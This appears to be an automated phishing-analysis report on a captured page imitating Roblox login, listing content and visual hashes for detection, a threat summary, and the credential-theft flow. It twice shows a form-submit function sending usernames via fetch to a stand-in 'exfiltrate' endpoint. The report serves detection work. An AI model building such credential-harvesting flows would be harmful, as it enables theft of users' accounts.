Detailed analysis of captured phishing page
Used to detect similar phishing pages based on HTML content
| Algorithm | Hash Value |
|---|---|
|
CONTENT
TLSH
|
T1E253E9B193106837946F56C7F574BF0563E3DB4AC68286E6F1A8A32A0DD4CA2FC07527 |
|
CONTENT
ssdeep
|
768:9iqXWZyjLHUaSDzx2qf2uuOCuOosHMMSBmiEI:9iqXWZyXHNmxuOCuOotAiEI |
Used to detect visually similar phishing pages based on screenshots
| Algorithm | Hash Value |
|---|---|
|
VISUAL
pHash
|
bc3c9e9261c3c3c3 |
|
VISUAL
aHash
|
1a9bffc3c3ffffff |
|
VISUAL
dHash
|
b232201602000206 |
|
VISUAL
wHash
|
008b8383c3ffff81 |
|
VISUAL
colorHash
|
07200010080 |
|
VISUAL
cropResistant
|
b232201602000206 |
• Amenaza: Phishing por suplantación
• Objetivo: Usuarios de Roblox
• Método: Imitación de una página de Roblox
• Exfil: Desconocido debido a la ofuscación de Javascript
• Indicadores: Coincidencia de dominio, ofuscación de Javascript, suplantación de marca
• Riesgo: Alto
The site is designed to trick users into entering their Roblox login credentials. The user will be prompted to enter their username and password via a form which then transmits this information to an attacker.
Obfuscated Javascript may be designed to inject other elements such as redirects or additional attacks, or to exfiltrate information collected by the site.
Functions: submitForm, sendData
User fills <input name='username'> → submitForm() → fetch('https://api.example.com/exfiltrate') → Data sent to remote server
User fills <input name='username'> → submitForm() → fetch('https://api.example.com/exfiltrate') → Data sent to remote server
0c2a7c793ed0761b93b214956992ffb44014abcb404fd8bd2f9a7eb32ea0a600.jssubmitFormsendDataPages with identical visual appearance (based on perceptual hash)
Found 10 other scans for this domain